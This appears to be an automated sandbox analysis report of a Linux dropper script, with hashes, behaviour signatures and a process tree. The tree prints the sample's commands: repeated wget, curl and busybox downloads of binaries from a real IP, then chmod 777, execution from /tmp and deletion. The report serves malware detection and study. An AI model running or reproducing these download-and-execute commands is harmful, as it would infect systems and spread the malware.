Analysis
-
max time kernel
16s -
max time network
18s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 692 chmod 729 chmod 753 chmod 720 chmod 769 chmod 775 chmod 781 chmod 787 chmod 795 chmod -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ 693 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq 721 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL 730 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 754 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA 770 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl 776 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs 782 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS 788 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t 796 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t -
Checks CPU configuration 1 TTPs 9 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ curl File opened for modification /tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL curl File opened for modification /tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA curl File opened for modification /tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl curl File opened for modification /tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t curl File opened for modification /tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq curl File opened for modification /tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27 curl File opened for modification /tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs curl File opened for modification /tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS curl
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:641
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:685
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:697
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:715
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:721
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:722
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:723
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:726
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:732
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:733
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:747
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:756
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:757
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:768
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:771
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:772
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:774
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:777
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:778
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:780
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:783
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:784
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:786
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:789
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:790
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:793
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:797
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:798
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97